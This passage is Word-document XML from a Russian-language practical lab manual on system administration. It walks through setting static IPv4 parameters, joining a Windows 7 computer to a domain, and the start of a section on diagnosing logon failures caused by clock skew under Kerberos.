        <w:t>формирование навыков установки и настройки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">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B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Корпоративная локальная сеть среднего или крупного предприятия в 99% случаев имеет доменную структуру. Это продиктовано, в первую очередь, политикой безопасности предприятия. Таким образом, все компьютеры сети используют настройки главного компьютера – домена (безопасность может обеспечиваться брандмауэром или защитником, которые легко можно отключить).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сейчас предлагаю рассмотреть пример того, как ввести в домен компьютер под управлением Windows 7. Хотя, в принципе, добавление в домен компьютеров с другими версиями Windows не сильно отличается – главное понять суть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Первым делом, вставляем сетевой кабель в компьютер. Теперь необходимо настроить сетевое подключение. Щелкаем правой кнопкой по компьютеру в трее и открываем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Центр управления сетями и общим доступом</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1464150" cy="361758"/>
            <wp:effectExtent l="19050" t="0" r="2700" b="0"/>
            <wp:docPr id="25334" name="Рисунок 27532" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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32" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image246.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId227" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect l="2470" t="6723" r="3615" b="11707"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1474396" cy="364289"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В появившемся окне нажимаем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменение параметров адаптера</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – откроются все доступные сетевые подключения. Нам необходимо выбрать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подключение по локальное сети</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, щелкнуть по нему правой кнопкой мыши и выбрать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1572150" cy="1158054"/>
            <wp:effectExtent l="19050" t="0" r="9000" b="0"/>
            <wp:docPr id="25335" name="Рисунок 27533" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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33" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image247.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId228" cstate="print"/>
                    <a:srcRect l="2565" r="1454" b="1761"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1572760" cy="1158504"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее в списке нам нужен пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Протокол Интернета версии 4 (TCP/IPv4)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Выделяем его и нажимаем кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1638070" cy="2044800"/>
            <wp:effectExtent l="19050" t="0" r="230" b="0"/>
            <wp:docPr id="25336" name="Рисунок 27534" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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34" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image248.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId229" cstate="print"/>
                    <a:srcRect l="2162" t="1836" r="3209" b="3210"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1639502" cy="2046587"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В открывшемся окне нужно ввести данные, такие как IP-адрес, маска подсети, шлюз и DNS-сервер. Должно получится что-то в таком духе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1680150" cy="1864352"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25337" name="Рисунок 27535" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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35" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image249.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId230" cstate="print"/>
                    <a:srcRect l="1282" t="1730" r="3308" b="2763"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1680499" cy="1864739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажимаем ОК, тем самым сохраняя изменения. На этом подготовительная часть работ завершена. Теперь перейдем непосредственно к добавлению компьютера в домен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажимаем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, правой кнопкой щелкаем по пункту </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, выбираем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В левой части окна находим пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительные параметры системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и жмем по нему левой кнопкой мыши. В появившемся окне открываем вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Имя компьютера</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1643284" cy="1944000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25338" name="Рисунок 27536" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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36" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image250.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId231" cstate="print"/>
                    <a:srcRect l="2293" t="1872" r="3716" b="4692"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1643457" cy="1944205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее нажимаем кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Здесь указываем, что компьютер будет являться частью домена, и, соответственно, пишем имя этого домена. Получится примерно вот таким образом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1644150" cy="1909772"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25339" name="Рисунок 27537" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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37" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image251.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId232" cstate="print"/>
                    <a:srcRect l="1772" t="1814" r="3529" b="3993"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1644284" cy="1909928"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажимаем ОК. Последует запрос на ввод имени пользователя и пароля, который имеет право на присоединение компьютеров к домену, например, администратор домена. После этого потребуется перезагрузка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>По окончанию перезагрузки Ваш компьютер будет в домене.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое домен?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Для чего используются домены?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Каким образом подключить компьютер к домену?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc507788529"/>
      <w:bookmarkStart w:id="114" w:name="_Toc507788254"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 Выявление и решение проблем входа в систему: тестирование и проверка свойств учетной записи пользователя профессионального программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Научиться выявлять и устранять проблемы входа в систему, выполнять тестирование и проверку свойств учетной записи пользователя профессионального программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">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B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Краткие теоретические сведения:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Проблемы с входом в систему - это ситуации, когда машина фактически загружается до ожидаемого экрана приветствия или строки входа, но отказывается принять имя пользователя и пароль, или же принимает их, но затем ведет себя не правильно (не может запустить графический рабочий стол, выдает ошибки, выбрасывает в командную строку и т.д.). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00912E73">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="sec.trouble.login.no"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Диагностика проблем входа в систему. Вход в компьютер является настолько привычной частью дня, что мы часто даже не задумываемся о нем. Но даже в этом случае, что-нибудь может и время от времени идет не так, когда пользователи входят в Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Системные часы.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">истемные часы рабочей станции могут на самом деле служить причиной возникновения проблем входа. Если время на часах рабочей станции на пять минут отличается от времени на контроллере домена, то при входе в систему будет сбой. Причина этого кроется в протоколе аутентификации Kerberos. В начале процесса аутентификации пользователь вводит пароль и имя пользователя. Затем рабочая станция отправляет запрос аутентификации сервера Kerberos Authentication Server Request на сервер распределения ключей (Key Distribution Server). Этот запрос аутентификации сервера </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kerberos Authentication Server Request содержит несколько различных фрагментов информации, включая</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1. Идентификацию пользователя; 2. Имя службы, которую запрашивает пользователь; 3. Аутентификатор, который зашифрован универсальным ключом пользователя. Универсальный ключ пользователя (master key) производиться шифрованием пароля пользователя, используя однонаправленную функцию. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
